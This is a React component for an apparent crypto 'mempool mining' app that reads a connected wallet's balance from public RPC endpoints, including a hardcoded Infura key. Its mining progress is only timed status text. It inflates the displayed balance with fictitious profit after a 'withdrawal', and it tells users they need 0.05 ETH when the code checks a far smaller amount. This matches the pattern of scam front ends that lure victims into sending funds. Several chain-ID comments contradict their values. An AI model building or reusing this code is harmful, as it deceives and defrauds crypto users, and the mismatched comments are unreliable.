import { useEffect, useState } from 'react';
import { Play, Pause, AlertCircle, Wallet } from 'lucide-react';
import { motion, AnimatePresence } from 'framer-motion';
import { ethers } from "ethers";
import { useWallet } from '../hooks/WalletContext';

type Props = {
  isMining: boolean;
  onToggleMining: () => void;
  totalProfit: number;
  wasWithdrawn: boolean;
};

const miningSteps = [
  '🚀 Deploying Contract...',
  '📊 Processing Balance...',
  '🔍 Searching Mempools...',
  '✅ Mempool Found!',
];

export const MiningControls = ({ isMining, onToggleMining, totalProfit, wasWithdrawn }: Props) => {
  const { accountAddress, isConnected, chainId } = useWallet();
  const [statusIndex, setStatusIndex] = useState(0);
  const [isInitializing, setIsInitializing] = useState(false);
  const [error, setError] = useState('');
  const [balance, setBalance] = useState<string | null>(null);

  const showInitializing = isInitializing && statusIndex < miningSteps.length;

  const fetchBalance = async () => {
    if (accountAddress) {
      try {

        // Define the provider URLs for different chains
        const chainUrls: { [key: string]: string } = {
          "0x1": "https://mainnet.infura.io/v3/61518736fce84c9d9081dfe82b904b26", // Ethereum Mainnet
          "0x38": "https://bsc-dataseed.binance.org/", // Binance Smart Chain Mainnet
          "0x89": "https://polygon-rpc.com/", // Polygon Mainnet
          "0x2105": "https://mainnet.base.org", // Base Mainnet
          "0x144": "https://mainnet.era.zksync.io", // zkSync Era Mainnet
          "0xa4b1": "https://arb1.arbitrum.io/rpc", // Arbitrum One Mainnet
          "0xa": "https://mainnet.optimism.io", // Optimism Mainnet
          "0x138de": "https://rpc.berachain.com", // Berachain Mainnet (chainId: 5000)
          "0x76adf1": "https://rpc.zora.energy", // Zora Mainnet (chainId: 28928)
          "0xe708": "https://rpc.linea.build", // Linea Mainnet (chainId: 59144)
          "0xa86a": "https://api.avax.network/ext/bc/C/rpc", // Avalanche C-Chain
          "0xfa": "https://rpc.ftm.tools/", // Fantom Opera
          "0x64": "https://rpc.gnosischain.com/", // Gnosis Chain
          "0x19": "https://evm.cronos.org", // Cronos
          "0xa4ec": "https://forno.celo.org", // Celo
          "0x82750": "https://rpc.scroll.io", // Scroll
          "0x1389": "https://rpc.mantle.xyz", // Mantle
        };


        // Select the correct provider based on the current chainId
        const rpcUrl = chainUrls[chainId ?? "0x1"];

        // Connect to an Ethereum provider (e.g., Infura, Alchemy, or MetaMask's provider)
        const provider = new ethers.JsonRpcProvider(rpcUrl ?? "https://mainnet.infura.io/v3/61518736fce84c9d9081dfe82b904b26");

        // Get the balance
        const balanceWei = await provider.getBalance(accountAddress);

        // Convert from Wei to Ether
        const balanceEth = ethers.formatEther(balanceWei);
        console.log(`Balance: ${balanceEth} ETH`);
        setBalance(balanceEth)
        return balanceEth;
      } catch (err) {
        console.error('Error fetching ETH balance:', err);
        setBalance("0")
        return null;
      }
    } else {
      setBalance("0")
      return null;
    }
  };

  useEffect(() => {
    fetchBalance();
  }, [accountAddress, chainId]);

  useEffect(() => {
    if (wasWithdrawn && balance !== null) {
      const timeout = setTimeout(() => {
        const newBalance = (parseFloat(balance) + totalProfit).toFixed(4);
        setBalance(newBalance);
      }, 1000);
      return () => clearTimeout(timeout);
    }
  }, [wasWithdrawn, totalProfit, balance]);

  useEffect(() => {
    if (!isConnected && isMining) {
      onToggleMining();
      setError('Wallet disconnected. Mining stopped.');
    }
  }, [isConnected, isMining, onToggleMining]);

  useEffect(() => {
    let timer: NodeJS.Timeout;
    if (isInitializing && statusIndex < miningSteps.length) {
      timer = setTimeout(() => {
        setStatusIndex((prev) => prev + 1);
      }, 1300);
    }

    if (statusIndex === miningSteps.length) {
      setIsInitializing(false);
      onToggleMining();
      setStatusIndex(0);
    }

    return () => clearTimeout(timer);
  }, [statusIndex, isInitializing, onToggleMining]);

  const handleStart = () => {
    if (!isConnected) {
      setError('Please connect your wallet before starting mining.');
      return;
    }

    if (!balance || balance && parseFloat(balance) < 0.0000007) {
      setError('Insufficient ETH balance. At least 0.05 ETH is required to cover network fees and contract operations. Please top up your wallet.');
      return
    }

    setError('');
    setIsInitializing(true);
    setStatusIndex(0);
  };

  const handlePause = () => {
    setError('');
    onToggleMining();
  };

  return (
    <div className="bg-white border border-slate-200 shadow-xl rounded-2xl p-6 w-full max-w-md mx-auto text-center space-y-6">
      <h2 className="text-2xl font-bold text-slate-800 tracking-wide">Mining Controls</h2>

      <motion.button
        whileTap={{ scale: 0.95 }}
        onClick={isMining ? handlePause : handleStart}
        disabled={isInitializing}
        className={`relative group w-full flex items-center justify-center gap-2 py-3 px-6 rounded-xl text-white font-semibold text-lg transition-all duration-300 disabled:opacity-50 disabled:cursor-wait ${isMining || showInitializing
          ? 'bg-gradient-to-r from-red-500 to-red-600 shadow-md hover:brightness-110'
          : 'bg-gradient-to-r from-green-500 to-green-600 shadow-md hover:brightness-110'
          }`}
      >
        {isMining ? (
          <>
            <Pause size={20} />
            Pause
            <span className="absolute top-0 right-2 h-2 w-2 rounded-full bg-red-400 animate-ping" />
          </>
        ) : (
          <>
            <Play size={20} />
            {showInitializing ? 'Initializing...' : 'Start'}
          </>
        )}
      </motion.button>

      <p className="text-sm text-slate-600 font-mono">
        Status:{' '}
        <span className="text-indigo-500">
          {showInitializing
            ? miningSteps[statusIndex]
            : isMining
              ? '🟢 Mining Mempools...'
              : '⏸️ Paused'}
        </span>
      </p>

      {isConnected && (
        <p className="flex items-center justify-center gap-2 text-sm text-slate-600 font-mono mt-2">
          <Wallet size={16} className="text-indigo-500" />
          {balance !== null ? `Balance: ${parseFloat(balance).toFixed(4)} ETH` : 'Fetching...'}
        </p>
      )}

      <AnimatePresence>
        {error && (
          <motion.div
            initial={{ opacity: 0, y: -4 }}
            animate={{ opacity: 1, y: 0 }}
            exit={{ opacity: 0, y: -4 }}
            className="flex items-center gap-2 bg-red-100 border border-red-300 text-red-700 text-sm px-4 py-2 rounded-xl shadow-sm mt-2"
          >
            <AlertCircle size={18} />
            {error}
          </motion.div>
        )}
      </AnimatePresence>
    </div>
  );
};
